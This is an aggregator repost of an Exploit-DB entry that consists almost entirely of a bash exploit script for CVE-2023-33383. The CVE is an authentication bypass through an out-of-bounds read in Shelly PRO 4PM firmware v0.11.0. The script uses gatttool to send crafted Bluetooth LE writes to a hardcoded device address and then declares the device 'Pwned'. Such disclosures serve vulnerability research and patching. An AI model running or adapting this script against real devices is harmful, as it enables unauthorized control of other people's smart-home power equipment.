1
[remote] Shelly PRO 4PM v0.11.0 - Authentication Bypass
source link: https://www.exploit-db.com/exploits/51657
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Shelly PRO 4PM v0.11.0 - Authentication Bypass
#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"
banner()
{
clear
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
echo -e "${GREEN}| CVE: CVE-2023-33383 |"
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}
banner
read -s -n 1 key
if [ "$key" = "x" ]; then
exit 0;
elif [ "$key" = "" ]; then
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
exit 0;
fi
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fi
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK